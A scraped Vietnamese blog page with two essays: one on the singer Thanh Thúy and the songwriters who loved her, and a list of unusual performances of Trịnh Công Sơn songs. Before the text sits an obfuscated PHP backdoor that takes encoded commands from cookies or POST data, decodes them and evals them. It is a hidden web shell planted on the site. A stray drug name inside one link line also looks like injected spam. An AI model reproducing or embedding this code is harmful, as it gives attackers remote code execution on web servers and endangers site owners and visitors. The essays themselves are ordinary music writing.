$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> trịnh-công-sơn – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: trịnh-công-sơn

Thanh Thúy – người tình trong mộng của cả một thế hệ…


Những giọt nước mắt ấy như một cơn mưa nhỏ trên tâm hồn mỏng mảnh của tôi đã khiến tôi phải lùi xa hơn nữa về một cõi đời nào còn xa xôi hơn đã từng làm tôi nhỏ lệ

Phải có một nỗi tuyệt vọng nào đó khởi đầu để tôi không ngừng dan díu với những giọt nước mắt của đời làm của cải riêng tư. Eva ăn trái cấm và sự sống thành hình. Tôi e cũng đã từng nuốt những giọt nước mắt để biết tận tình nói về những giọt nước mắt kia.

Chàng thư sinh gầy gò lang bạt vào Sài Gòn cuối thập niên 50 – Trịnh Công Sơn khi lần đầu nghe Thanh Thúy hát “Giọt mưa thu” của Đặng Thế Phong, và khóc… đã có câu nhận xét như thế. Và tôi cũng xin mượn câu nói đó của nhạc sĩ họ Trịnh để bắt đầu bài tản mạn ngắn về Thanh Thúy – người tình trong mộng của cả một thế hệ văn nhân, thi sĩ, nhạc sĩ… Sài Gòn xa cũ.

***

Thanh Thúy chưa bao giờ được xem như là hồng nhan có sắc đẹp khuynh quốc khuynh thành. Xét về lĩnh vực nghệ thuật, tiếng hát của cô không được đánh giá cao như những nữ danh ca Khánh Ly, Lệ Thu, Khánh Hà… Tuy nhiên, nếu nói về người phụ nữ được yêu mến, được hâm mộ và giành được nhiều tình cảm yêu thương nhất vào ngày đó thì phải xếp Thanh Thúy lên đầu.

Thanh Thúy bắt đầu đi hát từ năm 15 tuổi (1959) để kiếm tiền nuôi người mẹ đang bị bệnh nặng. Nơi cô xuất hiện đầu tiên là phòng trà Đức Quỳnh (vào cuối năm 1974 đổi tên thành Văn Hoa, hiện tại là rạp Thăng Long nằm ở đường Cao Thắng). Sau đó, cô tiếp tục trình diễn ở các phòng trà như: Văn Cảnh, Arc en ciel, Tự Do, Anh Vũ, Hòa Bình…

Cách phát âm của Thanh Thúy không chuẩn, tôi phải nói thế. Và đó cũng là đặc điểm chung của những giọng hát “rặc” miền Nam. Đối với phần lớn khán giả nghe không quen, thì ắt sẽ thấy khó chịu. Tuy nhiên, không thể không thừa nhận những giọng hát như thế dễ gây cho khán giả cảm giác rất thật, như những lời ca đó xuất phát từ tâm khảm của họ, không luyến láy, không kĩ thuật cao siêu. Đơn thuần là chân chất. Có thể tìm thử bài “Chiều mưa biên giới” qua giọng hát của quái kiệt Trần Văn Trạch, “Giọt mưa thu” với giọng hát nghiệp dư của kĩ sư địa chất Võ Anh Tuấn để cảm nhận rõ hơn về ý này.

Chính cái giọng hát rất u hoài, buồn man mác, nghẹn ngào của Thanh Thúy, kết hợp với hình ảnh một thục nữ trong tà áo dài e lệ, khi hát thì một tay vịn lấy dòng tóc đen đang buông lơi trên đôi vai gầy, một tay nâng chiếc micro, đã tạo nên một Thanh Thúy làm điên đảo biết bao người.

Ảnh Thanh Thúy

***

Đầu thập niên 60, ngọn bút đầu đàn của nhóm Sáng Tạo & Kịch Ảnh là nhà văn Mai Thảo đã gọi Thanh Thúy là “Tiếng hát lúc không giờ”. Nguyên Sa đã có lần hỏi Mai Thảo:
– Tại sao “Tiếng hát lúc không giờ?”
Mai Thảo trả lời bằng những tiếng ngắn: Vì muộn…
Rồi ông tiếp: – Là muộn màng…
– Là về khuya…
– Tôi vẫn thấy một con chim nhạn bay trong giòng sông sương mù…
– …
– Chậm và khuya…
– …
– Công phu… Kỳ lạ…

Ngoài ra, Thanh Thúy còn được gọi là “Tiếng hát khói sương” (Lâm Tường Dũ). Họa sĩ Vũ Hối cũng đã từng làm thơ để nói về tiếng hát Thanh Thúy:

Liêu trai tiếng hát khói sương
Nghẹn ngào nhung nhớ giòng Hương quê mình

Tuy nhiên, danh hiệu đi liền với tên tuổi Thanh Thúy nhất có lẽ đến từ ông Nguyễn Văn Trung, giáo sư Triết Đại Học Văn Khoa thời đó, trong chuyên đề “Ảo ảnh Thanh Thúy” đã gọi giọng hát của cô là “Tiếng hát liêu trai“. Và từ đó, danh hiệu đó đã đi cùng với cô.

***

“Ướt Mi” không phải là bản nhạc đầu tay của Trịnh, nhưng chính bản thân tác giả đã từng nói

Rất nhiều bài hát đã được viết trước bài Ướt mi nhưng riêng bài Ướt mi thì tồn tại như một số phận của nó và của tôi

Hãy cùng nghe Trịnh Công Sơn tâm sự

Thuở còn trọ học ở Sài Gòn, năm đó tôi mười bảy tuổi – Sơn kể – đêm nào tôi cũng lò dò đến phòng trà ca nhạc để nghe Thanh Thúy hát. Dần dần hình bóng Thanh Thúy đã ăn sâu vào trong tôi lúc nào không biết. Nói yêu Thanh Thúy thì cũng chưa hẳn. Vì tôi nhỏ tuổi hơn, lại nhiều mặc cảm nghèo và vô danh. Trong khi đó Thanh Thúy là một ca sĩ đang lên, kẻ đón người đưa tấp nập.

Biết vậy, nhưng tôi không thể không đêm nào thiếu hình ảnh và tiếng hát của nàng. Có đêm tôi chỉ đủ tiền để mua một ly nước chanh. Đêm đêm tôi thao thức với những khát khao, mơ ước là phải làm một cái gì đó để tỏ cho Thanh Thúy biết là tôi đang rất ngưỡng mộ nàng. Cái khát vọng đó đã giúp tôi viết nên bản nhạc “Ướt Mi” đầu tiên trong đời.

“Ướt Mi” là một nhạc phẩm hay kỳ lạ, buồn thương cảm đến não nề với những câu như “đừng khóc trong đêm mưa, đừng than trong câu ca“. Sau này, nhạc sĩ họ Trịnh còn viết bài “Thương một người” với hình ảnh “Thương ai về ngõ tối, sương rơi kín đôi vai…” để dành tặng Thanh Thúy.

Mối tình đơn phương của chàng nhạc sĩ trẻ tuổi, gọi là chút thoáng tình cảm đầu đời cũng được, gọi là tình say đắm nhưng vô vọng cũng được, có lẽ chỉ Trịnh là hiểu rõ nhất. Thôi thì hãy chỉ nên nhớ về nó như một bài hát đẹp, một câu chuyện đẹp, thế thôi.

***

null

Ngoài Trịnh Công Sơn ra, còn có một bài nhạc viết tặng Thanh Thúy cũng rất nổi tiếng: đó là bài “Tiếng hát về khuya” của nhạc sĩ Tôn Thất Lập. Tuy nhiên, trong số những văn nghệ sĩ hâm mộ Thanh Thúy, nổi tiếng nhất phải kể đến Trúc Phương.

Trúc Phương yêu Thanh Thúy, yêu bằng một tình yêu trọn vẹn, nhưng có lẽ hai người chỉ có duyên mà không có phận. Rất nhiều những tác phẩm để đời của Trúc Phương như Chuyện chúng mình, Bóng nhỏ đường chiều, Tàu đêm năm cũ… đều mang hình ảnh của Thanh Thúy, hay đúng hơn là về một mối tình đau thương và tuyệt vọng mà nhạc sĩ tài ba gởi gắm vào. Lại trớ trêu thay, chính “Tiếng hát liêu trai” đã góp phần làm những ca khúc của Trúc Phương bay thật cao, bay thật xa.

Thanh Thúy lên xe hoa về theo người khác, Trúc Phương vò võ nhớ thương. Thanh Thúy xa quê sống cuộc sống lưu vong, Trúc Phương ở lại quê nhà cùng bao hoài niệm.

Nhạc sĩ Trúc Phương đến trước khi chết trong nghèo khổ, sau một quãng thời gian đối mặt với căn bệnh ngặt nghèo, đã lìa bỏ cõi đời vào một ngày tháng 9 hơn 15 năm trước, vẫn luôn nhớ luôn mong hình bóng trong tâm tưởng đấy. Trong ca khúc “Mắt chân dung để lại”. dòng nhạc cuối đời của Trúc Phương vẫn ẩn hiện bóng người xưa:

Gửi người xưa bỏ ta để đôi mắt lại, giọt vắn giọt dài mãi đọng vũng bùn nhỏ, ta và em trót đã thiên thu nhầm lỡ, khóc mình khóc người, đỏ hoe suốt đời

Trúc Phương Thanh THúy

***

Tôi nghe Thanh Thúy, không phải vì đó là người từng làm điên đảo biết bao thi nhân, nhạc sĩ. Thật ra, tôi nghe Thanh Thúy trước, một thời gian lâu sau mới biết rằng Ướt MiThương Một Người của Trịnh, cùng hàng loạt ca khúc của Trúc Phương là dành tặng cho cô. Bỏ qua những giai thoại về cô, tôi thật sự yêu cái giọng hát ấy – một giọng hát đặc biệt và rất riêng, mà có lẽ ngoài cô ra không còn ca sĩ nào khác có được. Tôi xin mượn bài thơ của Hoàng Trúc Ly khi nói về giọng hát của cô để kết thúc bài này, vì những tưởng, khó mà có thể tìm được những ngôn từ mô tả nào thích hợp hơn:

Từ em tiếng hát lên trời
Tay xao dòng tóc, tay mời âm thanh.
Sợi buồn chẻ xuống lòng anh
Lắng nghe da thịt tan thành hư vô

210411,
B.l.u.e

p/s: Bài viết sử dụng một số tư liệu và hình ảnh trên trang www.thanhthuy.me. Về một số bài hát được nhắc đến:
– Ướt mi của Trịnh Công Sơn qua tiếng hát Thanh Thúy: http://music.hatnang.com/node/6246
– Tàu đêm năm cũ & Bóng nhỏ đường chiều qua tiếng hát Thanh Thúy: http://www.youtube.com/watch?v=cqNCYRPkW8c
– Chiều mưa biên giới qua tiếng hát quái kiệt Trần Văn Trạch: http://www.nhaccuatui.com/nghe?M=gA4nD0lpmO Zantac
.

Trịnh Công Sơn – mười năm, tình quen và kẻ lạ

Bánh xe thời gian cứ luôn tàn nhẫn quay những vòng quay vô lượng của nó. Hôm nay nhìn lên tờ lịch treo trước cửa nhà, chợt giật mình nhận ra rằng nhanh thật, mới đấy mà đã mười năm rồi kể từ cái ngày Trịnh Công Sơn trút hơi thở cuối cùng, vĩnh viễn bỏ mặc con đường mà đi về miền cát bụi.

Tôi nhớ lại, Khánh Ly trong một cuộc trò chuyện với nhạc sĩ Trịnh Công Sơn ở một nơi không phải quê hương của mình (1), đã từng phát biểu ”người sáng tác và người trình bày một ngày nào đó sẽ xa, sẽ có thể chìm vào quên lãng, nhưng tác phẩm thì không”. Người ta có thể một ngày nào đó sẽ quên tên ông, những chàng trai, cô gái nơi quán cốc vỉa hè sẽ thôi bàn luận về cuộc đời và sự nghiệp sáng tác của ông. Có thể lắm chứ? Nhưng có một điều chắc chắn là sẽ không ai quên được các tác phẩm của ông. Vì đơn giản, nhạc Trịnh về một mặt nào đó, nó quyện và gắn chặt vào ba tiếng Hồn-Việt-Nam.

Ngày giỗ của ông, người ta bàn về ông rất nhiều, trên khắp các mặt báo, trên khắp các diễn đàn. Người ta đào sâu vào cuộc đời của ông, những cuộc tình thoáng qua trong đời ông, và ở vài nơi, còn cả quan điểm, thái độ chính trị của ông. Những cái đó với tôi nó xa vời, xa xỉ quá.

Tôi nghe nhạc Trịnh, không phải nghe cuộc đời ông, mà là nghe những tác phẩm của ông. Bởi với tôi, chỉ đơn giản, những tác phẩm đó mới làm thành một thứ gọi là nhạc-Trịnh.

***

Tôi đọc được đâu đó câu: Hát nhạc Trịnh không khó, cái khó nằm ở chỗ người nghe… tự làm khó mình (2), đột nhiên tôi nảy ra ý định viết ngắn về những bản nhạc Trịnh quen nhưng lạ. Quen ở đây là những bài mà ai đó hầu như cũng một lần từng nghe, lạ là những ca sĩ (nghệ sĩ) trình bày nó sẽ khiến bạn ban đầu nhướng mày ngạc nhiên hỏi:

– Ai hát thế nhỉ?

để rồi sau đó vỗ đùi đen đét và thốt lên:

– Tuyệt!

Danh sách này dĩ nhiên là hoàn toàn là ý kiến cá nhân của tôi, tựa như bạn đi dạo trên bờ biển và nhặt được những vỏ sò long lanh, đẹp đẽ một cách – rất – tình – cờ.

***

1. Bài đầu tiên là Tiến Thoái Lưỡng Nan do chính Trịnh Công Sơn hát, một lần tôi nghe theo kiểu cứ chọn đại trong danh sách Suggestion của youtube thì tới bài này. Video clip trắng đen, dáng vẻ gầy gò, khắc khổ trên sân khấu. Giọng nhạc sĩ khàn khàn, cuốn hút một cách kì lạ. Ông như đang hòa mình vào từng giai điệu, từng lời ca.

Tôi ấn tượng về bài hát này một phần vì nó hiếm quá, tôi nào thấy được nhạc sĩ nhiều như thế đâu, một phần vì hai chữ lận đận lập đi lập lại trong bài, đặc biệt là câu cuối ngày nay lận đận gọi là… giọt hư không nghe sao mà buồn như vậy?

Tôi tìm thấy một Trịnh – không – chỉ – của – những – bản – tình – ca, mà là một Trịnh đầy khắc khoải…

Link: http://www.youtube.com/watch?v=G-0gHDV_LJE

2. Khánh Ly đơn giản là cái tên không cần phải giới thiệu nhiều. Khi nhắc đến cô, người ta nghĩ đến nhạc Trịnh, và khi nói đến các bài hát của Trịnh, tự khắc người ta liên tưởng đến cô. Vì thế, bảo là muốn tìm được gì là lạ trong nhạc Trịnh khi nghe Khánh Ly hát e rằng hơi khó. Tuy nhiên, một ngày, trong lúc ngồi trong thư viện, tự nhiên tôi nhớ tới việc có vài bài hát của Trịnh Công Sơn được dịch ra tiếng Nhật và được đông đảo khán thính giả xứ sở hoa anh đào ưa thích. Lần mò một hồi, tôi tìm ra video clip Utsukushi Mukashi.

Utsukushi Mukashi là tên tiếng Nhật của bài Diễm Xưa, được Khánh Ly trình bày ở hội chợ Osaka vào năm 1970. Bài này sau đó được phổ biến rộng rãi qua tiếng hát của Yoshimi Tendo, một ca sĩ nổi danh ở Nhật.

Video tôi tìm không rõ có phải là thu hình vào đúng ở hội chợ Osaka không, nhưng nghe Khánh Ly hát Diễm Xưa bằng tiếng Nhật cũng là trải nghiệm thú vị, và là lạ.

Link: http://www.youtube.com/watch?v=tQszDqxLnq4

3. Cái tên kế tiếp khiến bài nhạc Trịnh trở nên lạ trong tôi là Nguyễn Đình Toàn. Tôi biết đến Nguyễn Đình Toàn nhà văn với tác phẩm Giờ Ra Chơi được ưa thích Giải Phóng, một Nguyễn Đình Toàn nhà thơ của những Hiên cúc vàng, Khi em về, một Nguyễn Đình Toàn nhạc sĩ với Tình khúc thứ nhất viết chung cùng Vũ Thành An, bài Bông hồng tạ ơn rất nổi tiếng. Nhưng đây là lần đầu tôi nghe Nguyễn Đình Toàn hát.

Album 11 ca khúc Trịnh Công Sơn của Nguyễn Đình Toàn chỉ có tiếng guitar mộc mạc vang lên, giọng ông cũng không lấy gì làm đặc sắc, ấy vậy mà chả hiểu sao tôi lại thấy quen thuộc ghê, như là người cũ hát về bài hát của một thời xa cũ vậy.

Link album: http://mp3.zing.vn/playlist/11-Ca-Khuc-Trinh-Cong-Son-Nguyen-Dinh-Toan/ZWZ9ZWWO.html

4. Kim Thoa có lẽ là một ca sĩ ít được mọi người chú ý. Nhiều người bảo rằng Kim Thoa có giọng hát rất giống Ngọc Lan – đóa hoa tài sắc vẹn toàn của nền văn nghệ hải ngoại. Thực ra tôi không kiếm được nhiều thông tin về Kim Thoa, tất cả những gì tôi biết về Kim Thoa là qua vài bài nhạc Trịnh tìm được trên mạng. Đặc biệt là ở bài Phôi Pha này, giọng hát Kim Thoa có gì đó còn truyền cảm hơn cả nữ ca sĩ Khánh Ly

Link bài Phôi Pha: http://www.youtube.com/watch?v=7qSMCilSzQ8

5. Âm nhạc luôn có những khoảnh khắc kì diệu, như là hàng ngàn người hòa mình, nghẹn ngào chỉ bởi một câu hát trong một bài nhạc nào đó. Và ca sĩ làm được điều này, dù chỉ trong một phút giây ngắn ngủi, hẳn cũng đáng để được gọi là tài năng.

Thủy Tiên không phải là một ca sĩ, hay nếu nói đúng hơn thì chưa bao giờ là một người đi hát chuyên nghiệp, nhưng nếu xét ở tiêu chí mà tôi đã nói ở trên, thì cô thật sự đã có những phút giây thăng hoa trong tiếng hát.

Trong đêm nhạc “Hàng cây thắp nến” tổ chức tại Hội quán Hội ngộ năm nào, khi nhà thơ Đỗ Trung Quân giới thiệu về một cô ca sĩ có khuôn mặt không được xinh, nhưng tiếng hát thật đẹp, có lẽ nhiều khán thính giả ở đó ngạc nhiên vì một tên tuổi còn mới lạ. Nhưng vào lúc giọng hát ấy cất lên câu Xin cho tôi nguyên vẹn hình hài, người ta sau đó kể lại rằng, cả mấy ngàn người khi đó bất giác đều lặng đi. Một cô gái với đôi mắt trong sáng nhưng giọng hát thật buồn và da diết.

Tôi tìm trên youtube bài Xin cho tôi do cô hát, lần nào nghe xong, cảm giác của tôi cũng chỉ cô đọng lại trong hai chữ: xúc động.

Link bài Xin cho tôi: http://www.youtube.com/watch?v=AFbrmU3mCIo

6. Tầm cách đây hơn một năm rưỡi, trên các mạng xã hội, diễn đàn… người ta hay chuyền tay nhau bản video clip một anh chàng người Anh đàn và hát bản Diễm Xưa của Trịnh Công Sơn. Lee Kirby có giọng hát không phải gọi là quá xuất sắc cùng việc phát âm tiếng Việt không hoàn toàn rõ ràng. Bảo rằng tôi thích thì cũng không hẳn là thích, nhưng tôi thấy lạ. Lạ không phải vì yếu tố người – nước – ngoài – hát – nhạc – Việt, mà là không hiểu sao, có đôi đoạn, tôi nghĩ rằng anh ấy đã hòa được vào cái hồn của bài hát – điều mà ngay cả các ca sĩ bản địa cũng rất khó khăn mới làm được.

Nếu bạn đã quên anh chàng Diễm xưa của xứ sở sương mù này, hay chưa từng nghe qua bản này bao giờ, thì cứ thử một lần vậy xem: http://www.youtube.com/watch?v=0LQFVPMA9rE

7. Trong số các ca sĩ trẻ hướng mình theo dòng nhạc trữ tình, lãng mạn thời điểm hiện tại thì Lê Hiếu luôn là một cái tên mà tôi thích, và thích nghe nhất. Nhận xét về Hiếu, nhạc sĩ Quốc Bảo từng viết

Giọng hát của Lê Hiếu là một giọng ca sạch sẽ hiếm hoi, nhẹ nhàng mà chất chứa những ưu phiền đằm sâu hiếm thấy ở một ca sĩ trẻ.

Vì thế, nghe Hiếu hát nhạc Trịnh, tôi thấy gì đó rất trong nhưng hoàn toàn đủ độ lắng, đọng lại như những gợn sóng nhỏ nơi tâm hồn người nghe.

Tôi nghe Mưa hồng Hiếu hát trong album Dạ khúc dương cầm phát hành tầm hai năm về trước. Mưa hồng trước Hiếu được không biết bao nhiêu tên tuổi hát, từ giọng khàn ấm của Khánh Ly, tới giọng hát sang trọng, quý phái khi Tuấn Ngọc kết hợp với Bằng Kiều. Tuy nhiên, dường như không bị chút mảy may ảnh hưởng nào từ những cái bóng quá lớn, Hiếu mạnh dạn chọn cho mình cách tiếp cận khác – dương cầm. Trong tiếng dương cầm thánh thót, giọng của Hiếu vang lên, những nốt-nhạc như hòa vào những nốt-mưa.

Một bản thu lạ tai, nhưng tôi cảm thấy thích cũng – đến – là – lạ: http://www.youtube.com/watch?v=ZOEAlz0XzlQ

8. Một người thỉnh thoảng hay được gọi là Trịnh Công Sơn nữ. Một người nổi tiếng với những gì ra ngoài khỏi sân khấu, và được mặc định là ca sĩ nhạc-Quốc-Bảo. Thật tình, tôi chưa bao giờ nghĩ ra được Lý và Mai Khôi kết hợp lại hát chung sẽ như thế nào. Nhưng, VTV9, sân khấu chỉ với hai cái ghế ngồi, hay micro cắm đứng, không ban nhạc, không hát bè, hai cây guitar và hai giọng hát, Lý và Khôi đã làm tôi bất ngờ.

Tiếng guitar đôi lúc tôi cảm thấy hơi lạc điệu, nhưng nhìn chung đó không là đáng kể, vì cách hai cô gái ấy thể hiện bài hát tuyệt quá. Để gió cuốn đi có lẽ là bài hát có câu được trích dẫn nhiều nhất trong nhạc Trịnh, vốn dĩ tưởng rất quen, nhưng lại hóa lạ nhờ cái khung cảnh kết hợp ấy.

Nếu một ngày nào đó bạn thấy mất niềm tin vào cuộc sống, hay luôn nhớ rằng tình người và lòng người rất bao la, hãy mở lòng mình ra, và để gió cuốn đi: http://www.youtube.com/watch?v=Vmqlj9V1nDU

9. Những ngày gần đây, tên tuổi của Uyên Linh không còn xa lạ nữa. Người ta nói nhiều về cô, chê có, khen cũng có. Uyên Linh hát chưa nhiều, nên khó có thể có cái đánh giá rõ ràng về cô, giọng hát cô hay dòng nhạc mà cô theo đuổi.

Có một điều rất lạ ở Việt Nam đó là các ca sĩ muốn khẳng định mình, thì phải có một giai đoạn nào đó “hát” Trịnh (trừ những tên tuổi đã rất nổi tiếng trước đó – hay cùng thời với Trịnh). Uyên Linh lên như diều không dây, rồi cũng tới ngày Linh thử sức mình với nhạc Trịnh: một thước đo vô-hình nhưng gần như là chuẩn-mực ở Việt Nam

Mời các bạn cùng xem lại bài gần đây mà Uyên Linh hát Trịnh: http://www.youtube.com/watch?v=dPwe6QIESBo Yêu Dấu Tan Theo. Liệu sau những Khánh Ly, Hồng Nhung… lại xuất hiện thêm một người – đàn – bà – hát – Trịnh nữa chăng?

10. Chốt lại danh sách nhỏ của tôi, là bài Về nơi cuối trời được cất lên trong đêm tưởng nhớ Trịnh Công Sơn cách đây không lâu.

Nhạc sĩ Trịnh Công Sơn đã ra đi, ta hát tiễn đưa ông về nơi cuối trời… giọng trầm ấm của nhà thơ Đỗ Trung Quân vang lên.

Về nơi cuối trời, xin mượn bài hát qua sự trình bày của Đỗ Trung Quân và Kim Lan để kết thúc bài này, và mở đầu một ngày – nhớ – Trịnh của riêng tôi: http://www.nhaccuatui.com/nghe?M=XGR9-vuC4h

————————-

(1) Nguyên văn lời của Khánh Ly trong cuộc trò chuyện với Trịnh Công Sơn

(2) Từ Facebook của ca sĩ Đức Tuấn
.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.